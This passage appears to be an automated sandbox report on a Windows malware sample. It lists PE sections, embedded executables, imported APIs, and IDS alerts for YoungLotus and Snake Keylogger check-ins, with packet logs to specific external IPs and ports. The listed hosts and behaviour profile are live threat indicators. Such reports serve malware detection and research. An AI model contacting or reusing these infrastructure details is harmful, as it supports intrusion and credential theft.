                                                                                        .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xb00000x1dd300x1de00daf146f8e49cbca77b0d76e82c3dc4bfFalse0.46090481171548114data5.534450490781437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                        RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                        RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                        RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                        RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                        RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                        RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                        RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                        RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                        RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                        RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                        RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                        RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                        RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                        RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                        RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                        RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                        RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                        RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.06801125703564728
                                                                                        RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                        RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                        RT_STRING0xb4af40x358data0.3796728971962617
                                                                                        RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                        RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                        RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                        RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                        RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                        RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                        RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                        RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                        RT_STRING0xb67b80xdcdata0.6
                                                                                        RT_STRING0xb68940x320data0.45125
                                                                                        RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                        RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                        RT_STRING0xb6da40x268data0.4707792207792208
                                                                                        RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                        RT_STRING0xb74040x378data0.41103603603603606
                                                                                        RT_STRING0xb777c0x380data0.35379464285714285
                                                                                        RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                        RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                        RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                        RT_STRING0xb800c0x368data0.40940366972477066
                                                                                        RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                        RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                        RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                        RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                        RT_RCDATA0xb8e040x10data1.5
                                                                                        RT_RCDATA0xb8e140xc000PE32 executable (GUI) Intel 80386, for MS Windows0.43280029296875
                                                                                        RT_RCDATA0xc4e140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                        RT_RCDATA0xc4e180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                        RT_RCDATA0xc8a180x64cdata0.5998759305210918
                                                                                        RT_RCDATA0xc90640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                        RT_RCDATA0xc91b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                        RT_GROUP_CURSOR0xcd98c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                        RT_GROUP_CURSOR0xcd9a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                        RT_GROUP_CURSOR0xcd9b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0xcd9c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0xcd9dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0xcd9f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_CURSOR0xcda040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                        RT_GROUP_ICON0xcda180x14dataTurkishTurkey1.1
                                                                                        RT_VERSION0xcda2c0x304dataTurkishTurkey0.42875647668393785

                                                                                        Imports

                                                                                        DLLImport
                                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                        user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                        advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                        kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                        ole32.dllCLSIDFromString
                                                                                        kernel32.dllSleep
                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                        ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                        oleaut32.dllGetErrorInfo, SysFreeString
                                                                                        comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                        shell32.dllShellExecuteExA, ExtractIconExW
                                                                                        wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                        shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                        advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                        wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                        netapi32.dllNetbios

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        TurkishTurkey

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-24T22:11:04.821651+01002814897ETPRO MALWARE W32.YoungLotus Checkin1192.168.2.449733103.36.221.1958790TCP
                                                                                        2024-12-24T22:11:10.644957+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.44974069.42.215.25280TCP
                                                                                        2024-12-24T22:11:10.645213+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449735142.250.181.14443TCP
                                                                                        2024-12-24T22:11:10.645236+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449734142.250.181.14443TCP
                                                                                        2024-12-24T22:11:13.240931+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449745142.250.181.14443TCP
                                                                                        2024-12-24T22:11:13.244835+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449744142.250.181.14443TCP
                                                                                        2024-12-24T22:11:17.493276+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449759142.250.181.14443TCP
                                                                                        2024-12-24T22:11:17.493467+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449758142.250.181.14443TCP
                                                                                        2024-12-24T22:11:20.152684+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449764142.250.181.14443TCP
                                                                                        2024-12-24T22:11:20.259535+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449765142.250.181.14443TCP
                                                                                        2024-12-24T22:11:24.300966+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449781142.250.181.14443TCP
                                                                                        2024-12-24T22:11:24.305134+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449780142.250.181.14443TCP
                                                                                        2024-12-24T22:11:26.893764+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449784142.250.181.14443TCP
                                                                                        2024-12-24T22:11:27.019999+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449787142.250.181.14443TCP
                                                                                        2024-12-24T22:11:29.925816+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449796142.250.181.14443TCP
                                                                                        2024-12-24T22:11:29.934623+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449797142.250.181.14443TCP
                                                                                        2024-12-24T22:11:34.016732+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449808142.250.181.14443TCP
                                                                                        2024-12-24T22:11:34.030277+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449807142.250.181.14443TCP
                                                                                        2024-12-24T22:11:36.619576+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449812142.250.181.14443TCP
                                                                                        2024-12-24T22:11:36.734168+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449815142.250.181.14443TCP
                                                                                        2024-12-24T22:11:39.633528+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449823142.250.181.14443TCP
                                                                                        2024-12-24T22:11:39.644248+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449822142.250.181.14443TCP
                                                                                        2024-12-24T22:11:42.368794+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449829142.250.181.14443TCP
                                                                                        2024-12-24T22:11:42.374305+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449827142.250.181.14443TCP
                                                                                        2024-12-24T22:11:45.332367+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449838142.250.181.14443TCP
                                                                                        2024-12-24T22:11:45.338699+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449839142.250.181.14443TCP
                                                                                        2024-12-24T22:11:48.095679+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449841142.250.181.14443TCP
                                                                                        2024-12-24T22:11:48.107763+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449843142.250.181.14443TCP
                                                                                        2024-12-24T22:11:51.050695+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449853142.250.181.14443TCP
                                                                                        2024-12-24T22:11:51.061874+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449852142.250.181.14443TCP
                                                                                        2024-12-24T22:11:55.170346+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449861142.250.181.14443TCP
                                                                                        2024-12-24T22:11:55.244824+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449862142.250.181.14443TCP
                                                                                        2024-12-24T22:11:59.059409+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449873142.250.181.14443TCP
                                                                                        2024-12-24T22:11:59.183233+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449872142.250.181.14443TCP
                                                                                        2024-12-24T22:12:01.663647+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449876142.250.181.14443TCP
                                                                                        2024-12-24T22:12:01.801209+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449879142.250.181.14443TCP
                                                                                        2024-12-24T22:12:04.793241+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449888142.250.181.14443TCP
                                                                                        2024-12-24T22:12:04.801184+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449889142.250.181.14443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 22:11:06.501861095 CET497338790192.168.2.4103.36.221.195
                                                                                        Dec 24, 2024 22:11:06.621536970 CET879049733103.36.221.195192.168.2.4
                                                                                        Dec 24, 2024 22:11:06.623953104 CET497338790192.168.2.4103.36.221.195
                                                                                        Dec 24, 2024 22:11:06.721967936 CET497338790192.168.2.4103.36.221.195
                                                                                        Dec 24, 2024 22:11:06.841573000 CET879049733103.36.221.195192.168.2.4
                                                                                        Dec 24, 2024 22:11:07.603879929 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:07.603899956 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:07.603934050 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:07.604007006 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:07.604013920 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:07.604101896 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:07.612637043 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:07.612674952 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:07.612709045 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:07.612724066 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:08.840411901 CET4974080192.168.2.469.42.215.252
                                                                                        Dec 24, 2024 22:11:08.960047960 CET804974069.42.215.252192.168.2.4
                                                                                        Dec 24, 2024 22:11:08.960129976 CET4974080192.168.2.469.42.215.252
                                                                                        Dec 24, 2024 22:11:08.985790968 CET4974080192.168.2.469.42.215.252
                                                                                        Dec 24, 2024 22:11:09.105564117 CET804974069.42.215.252192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.308446884 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.308517933 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.309459925 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.309521914 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.310643911 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.310729027 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.311378956 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.311427116 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.356813908 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.356856108 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.357131004 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.357184887 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.360269070 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.360284090 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.360384941 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.360512972 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.361927032 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.362238884 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:09.403361082 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:09.403367043 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.644807100 CET804974069.42.215.252192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.644957066 CET4974080192.168.2.469.42.215.252
                                                                                        Dec 24, 2024 22:11:10.645243883 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.645272970 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.645335913 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.645345926 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.645351887 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.645364046 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.645411968 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.645411968 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.645593882 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.645658970 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.645678997 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.645915031 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.646505117 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.646536112 CET44349735142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.646569967 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.646573067 CET804974069.42.215.252192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.646598101 CET49735443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.646713018 CET4974080192.168.2.469.42.215.252
                                                                                        Dec 24, 2024 22:11:10.648447037 CET49744443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.648447037 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.648461103 CET44349734142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.648469925 CET44349744142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.648535013 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.648576975 CET49734443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.648597002 CET49744443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.651146889 CET49744443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.651158094 CET44349744142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.653209925 CET49745443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.653232098 CET44349745142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.653680086 CET49745443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.656362057 CET49745443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:10.656373978 CET44349745142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.792571068 CET49746443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:10.792581081 CET44349746142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.792643070 CET49746443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:10.792648077 CET49747443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:10.792660952 CET44349747142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.792903900 CET49746443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:10.792911053 CET44349746142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:10.792943954 CET49747443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:10.793221951 CET49747443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:10.793231964 CET44349747142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:12.341887951 CET44349744142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:12.341980934 CET49744443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:12.342658043 CET49744443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:12.342664003 CET44349744142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:12.345165968 CET49744443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:12.345171928 CET44349744142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:12.346381903 CET44349745142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:12.346447945 CET49745443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:12.347029924 CET49745443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:12.347035885 CET44349745142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:12.350200891 CET49745443192.168.2.4142.250.181.14
